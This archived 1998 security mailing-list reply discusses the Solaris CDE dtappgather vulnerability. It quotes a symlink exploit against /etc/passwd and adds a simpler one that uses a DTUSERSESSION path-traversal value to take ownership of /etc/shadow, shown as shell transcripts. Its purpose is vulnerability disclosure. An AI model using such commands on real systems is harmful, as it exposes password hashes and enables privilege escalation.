Re: /usr/dt/bin/dtappgather exploit

J.A. Gutierrez (spd@GTC1.CPS.UNIZAR.ES)
Tue, 24 Feb 1998 20:30:20 +0100

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Aleph One: "AOL Instant Messanger Bug"
Previous message: Mark M Marko: "FoolProof Insecurities"
Maybe in reply to: Mastoras: "/usr/dt/bin/dtappgather exploit"
Next in thread: J.A. Gutierrez: "Re: /usr/dt/bin/dtappgather exploit"

>
> I suppose you have learnt about CERT's advisory on dtappgather
> program. Well, here's the exploit:
>
> nigg0r@host% ls -l /etc/passwd
> -r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
> nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
> nigg0r@host% dtappgather

the exploit is much simpler than that.
hey, it's even documented on the man page :-)

Simply

$ id
uid=6969(foo) gid=666(bar)
$ ls -l /etc/shadow
-r-------- 1 root sys 234 Nov 7 1999 /etc/shadow
$ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
$ ls -l /etc/shadow
-r-xr-xr-x 1 foo bar 234 Nov 7 1999 /etc/shadow

Anyway, your exploit has an advantage: it works (at least,
in solaris 2.5), even after patching CDE according to CERT
advisory.
Solaris 2.6 seems to have the right permisions:

/var/dt -> rwxr-xr-x
/var/dt/appconfig -> rwxr-xr-x
/var/dt/tmp -> rwxrwxrwt

--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)

Next message: Aleph One: "AOL Instant Messanger Bug"
Previous message: Mark M Marko: "FoolProof Insecurities"
Maybe in reply to: Mastoras: "/usr/dt/bin/dtappgather exploit"
Next in thread: J.A. Gutierrez: "Re: /usr/dt/bin/dtappgather exploit"